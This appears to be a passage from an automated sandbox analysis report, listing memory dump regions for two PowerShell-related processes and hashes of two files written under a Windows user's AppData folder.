memory/3320-188-0x0000000007F40000-0x0000000008290000-memory.dmp

memory/3320-189-0x0000000007C20000-0x0000000007C3C000-memory.dmp

memory/3320-190-0x0000000008290000-0x00000000082DB000-memory.dmp

memory/3320-191-0x0000000008570000-0x00000000085E6000-memory.dmp

memory/3320-192-0x00000000010E0000-0x00000000010E1000-memory.dmp

memory/3320-200-0x00000000075B0000-0x0000000007BD8000-memory.dmp

memory/3320-201-0x00000000095D0000-0x0000000009603000-memory.dmp

memory/3320-202-0x00000000095D0000-0x0000000009603000-memory.dmp

memory/3320-203-0x0000000007380000-0x00000000073A2000-memory.dmp

memory/3320-204-0x0000000007520000-0x0000000007586000-memory.dmp

memory/3320-205-0x0000000007C50000-0x0000000007CB6000-memory.dmp

memory/3320-206-0x0000000008290000-0x00000000082DB000-memory.dmp

memory/3320-207-0x0000000008570000-0x00000000085E6000-memory.dmp

memory/3320-208-0x00000000093B0000-0x00000000093CE000-memory.dmp

memory/3320-213-0x0000000009710000-0x00000000097B5000-memory.dmp

memory/3320-214-0x000000007F1D0000-0x000000007F1D1000-memory.dmp

memory/3320-215-0x0000000009930000-0x00000000099C4000-memory.dmp

memory/3320-282-0x00000000049C3000-0x00000000049C4000-memory.dmp

memory/3320-409-0x0000000009890000-0x00000000098AA000-memory.dmp

memory/3320-414-0x0000000009890000-0x00000000098AA000-memory.dmp

memory/3320-415-0x0000000009870000-0x0000000009878000-memory.dmp

memory/3320-420-0x0000000009870000-0x0000000009878000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

memory/2868-433-0x0000000000CC0000-0x0000000000CF6000-memory.dmp

memory/2868-434-0x0000000006ED0000-0x00000000074F8000-memory.dmp

memory/2868-435-0x0000000006DD0000-0x0000000006DF2000-memory.dmp

memory/2868-436-0x00000000075E0000-0x0000000007646000-memory.dmp

memory/2868-437-0x0000000007500000-0x0000000007566000-memory.dmp

memory/2868-438-0x0000000007650000-0x00000000079A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 932fbbcec97a66cb6d8b534b3adcb522
SHA1 4b4e0903311f976910faf1ad20e79a1fd258d70e
SHA256 15a4ba93d79fe7fe5ae613f220df3c078a346279c46b013142827489aab25101
SHA512 3e150fa1e954b3a8bad6b72c0025eb89f2c121271da9e2c6d3f941c389f5f419394d98b1b8e0d729abd1b05e8bd243838e15cdec3e1e4c64ea28ccf84177e4e5

memory/2868-440-0x00000000079A0000-0x00000000079BC000-memory.dmp

memory/2868-441-0x00000000079E0000-0x0000000007A2B000-memory.dmp

memory/2868-442-0x0000000000F60000-0x0000000000F61000-memory.dmp

memory/2868-443-0x0000000000F62000-0x0000000000F63000-memory.dmp

memory/2868-444-0x0000000007C90000-0x0000000007D06000-memory.dmp

memory/2868-453-0x0000000006ED0000-0x00000000074F8000-memory.dmp

memory/2868-454-0x0000000008B80000-0x0000000008BB3000-memory.dmp

memory/2868-456-0x0000000006DD0000-0x0000000006DF2000-memory.dmp

memory/2868-455-0x0000000008B80000-0x0000000008BB3000-memory.dmp

memory/2868-457-0x00000000075E0000-0x0000000007646000-memory.dmp

memory/2868-458-0x0000000007500000-0x0000000007566000-memory.dmp

memory/2868-459-0x00000000079E0000-0x0000000007A2B000-memory.dmp

memory/2868-460-0x0000000007C90000-0x0000000007D06000-memory.dmp

memory/2868-461-0x0000000008B60000-0x0000000008B7E000-memory.dmp

memory/2868-466-0x0000000008BD0000-0x0000000008C75000-memory.dmp

memory/2868-467-0x0000000009070000-0x0000000009104000-memory.dmp

memory/2868-471-0x0000000000F63000-0x0000000000F64000-memory.dmp

memory/2868-470-0x000000007F460000-0x000000007F461000-memory.dmp

memory/2868-662-0x0000000009040000-0x000000000905A000-memory.dmp

memory/2868-667-0x0000000009040000-0x000000000905A000-memory.dmp

memory/2868-668-0x0000000009030000-0x0000000009038000-memory.dmp

memory/2868-673-0x0000000009030000-0x0000000009038000-memory.dmp